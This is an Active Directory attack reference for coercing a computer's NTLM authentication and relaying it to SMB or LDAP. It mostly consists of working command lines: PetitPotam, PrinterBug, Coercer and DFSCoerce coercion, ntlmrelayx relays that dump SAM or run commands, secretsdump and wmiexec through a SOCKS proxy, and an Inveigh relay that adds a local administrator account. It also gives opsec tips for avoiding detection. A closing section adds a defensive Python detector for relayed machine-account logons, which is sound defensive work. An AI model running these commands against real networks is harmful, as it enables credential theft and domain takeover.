CoerceAndRelayNTLMToSMB
Force a target computer to authenticate to an attacker-controlled host via NTLM, then relay that authentication to SMB on another target to gain access.
Applies to: Computer → Computer
Linux Abuse
Step 1: Start ntlmrelayx (relay to SMB target)
# Relay to single target
ntlmrelayx.py -smb2support -t smb://<target-computer> -i
# Relay to multiple targets from file
ntlmrelayx.py -smb2support -tf targets.txt -i
# Auto-dump SAM on relay success
ntlmrelayx.py -smb2support -t smb://<target-computer>
# Execute command on relay success
ntlmrelayx.py -smb2support -t smb://<target-computer> -c 'whoami > C:\pwned.txt'
# Get SOCKS proxy for further access
ntlmrelayx.py -smb2support -t smb://<target-computer> --socks
Step 2a: Coerce via PetitPotam (MS-EFSRPC)
PetitPotam.py -u '<username>' -p '<password>' -d '<domain>' <attacker-ip> <target-computer>
# Unauthenticated (older unpatched DCs):
PetitPotam.py <attacker-ip> <target-computer>
Step 2b: Coerce via PrinterBug / SpoolSample (MS-RPRN)
printerbug.py '<domain>/<username>:<password>'@<target-computer> <attacker-ip>
Step 2c: Coerce via Coercer (multi-method)
# Scan for coerceable methods
coercer scan -t <target-computer> -u <username> -p '<password>' -d <domain>
# Coerce authentication
coercer coerce -t <target-computer> -l <attacker-ip> -u <username> -p '<password>' -d <domain>
Step 2d: Coerce via DFSCoerce (MS-DFSNM)
DFSCoerce.py -u '<username>' -p '<password>' -d '<domain>' <attacker-ip> <target-computer>
Step 3: Use SOCKS proxy from ntlmrelayx for further access
# After relay with --socks, connect via proxychains
proxychains smbclient //<target-computer>/C$ -U '<domain>/<username>'
proxychains secretsdump.py -no-pass '<domain>/<username>'@<target-computer>
proxychains wmiexec.py -no-pass '<domain>/<username>'@<target-computer>
Step 3 alt: Interactive SMB shell via -i flag
# ntlmrelayx opens local port (e.g. 11000) with interactive shell
nc 127.0.0.1 11000
Relay to LDAP instead of SMB (for adding objects, RBCD, shadow credentials)
# Relay to LDAP → add RBCD
ntlmrelayx.py -t ldap://<dc-ip> --delegate-access
# Relay to LDAPS → shadow credentials
ntlmrelayx.py -t ldaps://<dc-ip> --shadow-credentials --shadow-target <target-computer>
Combined two-terminal sequence (PetitPotam + relay to dump SAM)
# Terminal 1:
ntlmrelayx.py -smb2support -t smb://<target-computer>
# Terminal 2 (after ntlmrelayx is ready):
PetitPotam.py -u '<username>' -p '<password>' -d '<domain>' <attacker-ip> <coerced-computer>
Windows Abuse
Inveigh (PowerShell: combined capture + relay)
Import-Module Inveigh.ps1
Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <target-computer> -Command "net user /add hax P@ssw0rd && net localgroup administrators hax /add"
Responder + ntlmrelayx (cross-platform relay)
# Disable Responder SMB/HTTP servers, use it only for capture:
# Edit Responder.conf: SMB = Off, HTTP = Off
python Responder.py -I <interface> -rdw
# Then use ntlmrelayx from Linux side
Pre-requisites & Checks
# SMB signing must be DISABLED on relay target
nmap --script smb2-security-mode -p 445 <target-range>
netexec smb <target-range> --gen-relay-list targets.txt
# Check whether the target is patched against unauthenticated PetitPotam:
# CVE-2021-36942, patched Aug 2021; authenticated coercion still works post-patch
Opsec
- Disable Responder's SMB/HTTP listeners when using ntlmrelayx to avoid conflicts (set SMB = Off, HTTP = Off in Responder.conf)
- Relaying requires SMB signing disabled on the relay target: DCs have it enabled by default, workstations typically do not
- Coercion traffic (port 445 outbound from victim) may alert on NDR/IDS
- PetitPotam unauthenticated vector (CVE-2021-36942) is patched; use authenticated coercion post-patch
- Use --socks with ntlmrelayx for repeated access without re-triggering coercion
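From the defender's side, the artifact a successful coerce-and-relay leaves on the SMB relay target is a Security event 4624 (logon type 3, authentication package NTLM) for the coerced computer's machine account (e.g. WS01$) whose IpAddress is the relay host rather than that computer's own address. The detection sketch below is an added example, not part of this page or of any of the tools it lists; the inventory of machine accounts and the flattened key=value event lines are constructed for the example and do not reproduce real EVTX output.

```python
"""
Detection sketch for NTLM relay after coercion: flag 4624 network logons by
machine accounts that use NTLM and originate from an IP address other than
the one the account's own computer is known to use.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed inventory (assumption): machine account -> expected source IP.
KNOWN_HOSTS: Dict[str, str] = {
    "WS01$": "10.0.0.21",
    "FS01$": "10.0.0.30",
}

# Constructed sample events in a flattened key=value form (not real EVTX output).
# Line 1 is the relay signature: WS01$ over NTLM from 10.0.0.99, which is not WS01.
SAMPLE_EVENTS: List[str] = [
    "EventID=4624 TargetUserName=WS01$ LogonType=3 AuthenticationPackageName=NTLM IpAddress=10.0.0.99 WorkstationName=WS01",
    "EventID=4624 TargetUserName=WS01$ LogonType=3 AuthenticationPackageName=NTLM IpAddress=10.0.0.21 WorkstationName=WS01",
    "EventID=4624 TargetUserName=alice LogonType=3 AuthenticationPackageName=Kerberos IpAddress=10.0.0.50 WorkstationName=LT07",
    "EventID=4624 TargetUserName=FS01$ LogonType=3 AuthenticationPackageName=Kerberos IpAddress=10.0.0.30 WorkstationName=FS01",
    "EventID=4672 TargetUserName=WS01$ IpAddress=10.0.0.99",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


@dataclass
class Logon:
    account: str
    logon_type: int
    auth_package: str
    ip: str
    workstation: str


def parse_event(line: str) -> Optional[Logon]:
    """Parse one flattened event line; return None for anything that is not a 4624."""
    fields = dict(FIELD_RE.findall(line))
    if fields.get("EventID") != "4624":
        return None
    return Logon(
        account=fields.get("TargetUserName", ""),
        logon_type=int(fields.get("LogonType", "0")),
        auth_package=fields.get("AuthenticationPackageName", ""),
        ip=fields.get("IpAddress", ""),
        workstation=fields.get("WorkstationName", ""),
    )


def is_suspected_relay(logon: Logon, inventory: Dict[str, str]) -> bool:
    """True when a machine account logs on over NTLM (type 3) from an unexpected IP."""
    if not logon.account.endswith("$"):
        return False  # only machine accounts are of interest for this signature
    if logon.logon_type != 3 or logon.auth_package.upper() != "NTLM":
        return False  # Kerberos or non-network logons do not match the relay pattern
    expected = inventory.get(logon.account)
    if expected is None:
        return True  # unknown machine account: surface for review rather than ignore
    return ipaddress.ip_address(logon.ip) != ipaddress.ip_address(expected)


def find_suspected_relays(lines: List[str], inventory: Dict[str, str] = KNOWN_HOSTS) -> List[Tuple[str, str]]:
    """Return (account, source_ip) pairs that match the relay signature."""
    hits: List[Tuple[str, str]] = []
    for line in lines:
        logon = parse_event(line)
        if logon is not None and is_suspected_relay(logon, inventory):
            hits.append((logon.account, logon.ip))
    return hits


if __name__ == "__main__":
    for account, ip in find_suspected_relays(SAMPLE_EVENTS):
        print(f"possible NTLM relay: {account} authenticated over NTLM from {ip}")
```

The inventory lookup is the part that needs real data in production (DNS or the asset database); the rule itself is cheap enough to run over every 4624 on file servers and other hosts that still accept unsigned SMB, which is exactly where the Pre-requisites section says a relay lands.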